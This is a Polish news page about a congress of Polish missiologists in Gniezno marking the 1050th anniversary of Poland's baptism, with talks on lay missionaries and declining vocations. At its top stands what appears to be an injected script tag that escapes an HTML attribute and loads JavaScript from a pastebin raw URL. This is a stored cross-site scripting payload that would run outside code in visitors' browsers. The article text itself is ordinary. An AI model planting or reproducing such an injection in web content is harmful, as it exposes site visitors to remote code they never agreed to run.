">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

W Gnieźnie trwa dwudniowy Zjazd Misjologów Polskich nawiązujący w swoim temacie do obchodów 1050. rocznicy Chrztu Polski. Z uczestnikami spotkali się m.in. Prymas Polski abp Wojciech Polak oraz abp senior Henryk Muszyński.

Wśród uczestników zjazdu jest m.in. bp Jan Piotrowski z Kielc oraz ks. prof. Jan Górski, prezes Stowarzyszenia Misjologów Polskich. Spotkanie rozpoczęło się oficjalnie 12 września Mszą św. w kaplicy domu arcybiskupów gnieźnieńskich, sprawowaną pod przewodnictwem abp. Wojciecha Polaka.

W przedpołudniowej sesji uczestnicy zjazdu wysłuchali dwóch referatów: „Misyjna świadomość Kościoła Domowego”, który przygotował gospodarz spotkania ks. dr Franciszek Jabłoński oraz „Misyjny wymiar 1050. rocznicy Chrztu Polski”, który wygłosił gość specjalny zjazdu abp. senior Henryk Muszyński. W czasie dyskusji i popołudniowych obrad dyskutowano m.in. o współczesnym kształcie misjologii w Polsce oraz spadającej liczbie powołań kapłańskich i misyjnych. Dlatego – jak przyznał ks. Jabłoński – tak istotne jest zaangażowanie osób świeckich. „A może dać większą szansę świeckim misjonarzom i wolontariuszom, którzy wyjeżdżaliby na misje także z rodzinami? Takie ekipy ewangelizują świat. Myślę, że to jest właśnie przyszłość misyjnego Kościoła” – dodał ks. Jabłoński.